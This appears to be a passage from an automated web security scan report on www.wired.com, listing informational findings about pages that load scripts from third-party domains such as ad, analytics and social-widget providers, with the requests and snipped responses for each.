<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.12. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_A previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_A

Issue detail

The response dynamically includes the following scripts from other domains:

http://service.collarity.com/ucs/tracker.js
http://www.google-analytics.com/urchin.js

Request

GET /atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_A HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Length: 24466
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 12 Jan 2011 15:41:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://service.collarity.com/ucs/tracker.js">
</script>
...[SNIP]...

6.13. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_subServices previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_subServices

Issue detail

The response dynamically includes the following scripts from other domains:

http://service.collarity.com/ucs/tracker.js
http://www.google-analytics.com/urchin.js

Request

GET /atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_subServices HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 24466
Vary: Accept-Encoding
Date: Wed, 12 Jan 2011 15:41:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://service.collarity.com/ucs/tracker.js">
</script>
...[SNIP]...

6.14. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_contentPage_header previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/atg/registry/RepositoryTargeters/WIR/WIR_contentPage_header

Issue detail

The response dynamically includes the following scripts from other domains:

http://service.collarity.com/ucs/tracker.js
http://www.google-analytics.com/urchin.js

Request

GET /atg/registry/RepositoryTargeters/WIR/WIR_contentPage_header HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Length: 24466
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 12 Jan 2011 15:41:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://service.collarity.com/ucs/tracker.js">
</script>
...[SNIP]...

6.15. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_contentPage_headerCallout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/atg/registry/RepositoryTargeters/WIR/WIR_contentPage_headerCallout

Issue detail

The response dynamically includes the following scripts from other domains:

http://service.collarity.com/ucs/tracker.js
http://www.google-analytics.com/urchin.js

Request

GET /atg/registry/RepositoryTargeters/WIR/WIR_contentPage_headerCallout HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 24466
Vary: Accept-Encoding
Date: Wed, 12 Jan 2011 15:41:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://service.collarity.com/ucs/tracker.js">
</script>
...[SNIP]...

6.16. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_global_navBar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/atg/registry/RepositoryTargeters/WIR/WIR_global_navBar

Issue detail

The response dynamically includes the following scripts from other domains:

http://service.collarity.com/ucs/tracker.js
http://www.google-analytics.com/urchin.js

Request

GET /atg/registry/RepositoryTargeters/WIR/WIR_global_navBar HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 24466
Vary: Accept-Encoding
Date: Wed, 12 Jan 2011 15:41:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://service.collarity.com/ucs/tracker.js">
</script>
...[SNIP]...

6.17. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_global_navBar_rollover previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/atg/registry/RepositoryTargeters/WIR/WIR_global_navBar_rollover

Issue detail

The response dynamically includes the following scripts from other domains:

http://service.collarity.com/ucs/tracker.js
http://www.google-analytics.com/urchin.js

Request

GET /atg/registry/RepositoryTargeters/WIR/WIR_global_navBar_rollover HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Length: 24466
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 12 Jan 2011 15:41:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://service.collarity.com/ucs/tracker.js">
</script>
...[SNIP]...

6.18. http://www.wired.com/autopia/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/autopia/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /autopia/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:33:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=383
Expires: Wed, 12 Jan 2011 15:44:57 GMT
Date: Wed, 12 Jan 2011 15:38:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.19. http://www.wired.com/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/autopia/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 13:16:06 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=474
Expires: Wed, 12 Jan 2011 15:46:36 GMT
Date: Wed, 12 Jan 2011 15:38:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 87749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.20. http://www.wired.com/blogs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/blogs/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /blogs/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=240
Expires: Wed, 12 Jan 2011 15:42:28 GMT
Date: Wed, 12 Jan 2011 15:38:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang
...[SNIP]...


       <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
       </script>
...[SNIP]...

6.21. http://www.wired.com/cars/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/cars/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /cars/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=21
Expires: Wed, 12 Jan 2011 15:36:13 GMT
Date: Wed, 12 Jan 2011 15:35:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.22. http://www.wired.com/culture/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/culture/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /culture/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=71
Expires: Wed, 12 Jan 2011 15:37:05 GMT
Date: Wed, 12 Jan 2011 15:35:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.23. http://www.wired.com/dangerroom/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/dangerroom/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /dangerroom/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.24. http://www.wired.com/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 09:44:19 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=427
Expires: Wed, 12 Jan 2011 15:46:00 GMT
Date: Wed, 12 Jan 2011 15:38:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.25. http://www.wired.com/entertainment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/entertainment/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /entertainment/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=21
Expires: Wed, 12 Jan 2011 15:36:37 GMT
Date: Wed, 12 Jan 2011 15:36:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.26. http://www.wired.com/epicenter/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/epicenter/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widget.networkedblogs.com/getwidget?bid=204567
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /epicenter/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:48:52 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=469
Expires: Wed, 12 Jan 2011 15:46:57 GMT
Date: Wed, 12 Jan 2011 15:39:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://widget.networkedblogs.com/getwidget?bid=204567"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.27. http://www.wired.com/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
